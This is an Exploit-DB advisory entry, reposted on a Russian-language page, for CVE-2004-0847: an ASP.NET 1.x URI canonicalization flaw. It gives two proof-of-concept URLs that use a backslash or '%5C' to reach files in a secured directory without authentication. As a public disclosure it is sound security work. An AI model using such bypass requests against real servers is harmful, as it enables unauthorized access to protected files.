- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 24666
- Проверка EDB
-
- Пройдено
- Автор
- ANONYMOUS
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- cve-2004-0847
- Дата публикации
- 2004-10-06
Microsoft ASP.NET 1.x - URI Canonicalization Unauthorized Web Access
Код:
source: https://www.securityfocus.com/bid/11342/info
Microsoft ASP.NET is reported prone to a remote information-disclosure vulnerability because the application fails to properly secure documents when handling malformed URI requests.
An attacker may leverage this issue to bypass authentication required to access files in secured directories.
Mozilla Web Browser based proof of concept:
http://www.example.com/secureDirectory\somefile.aspx
Microsoft Internet Explorer based proof of concept:
http://www.example.com/secureDirectory%5Csomefile.aspx
- Источник
- www.exploit-db.com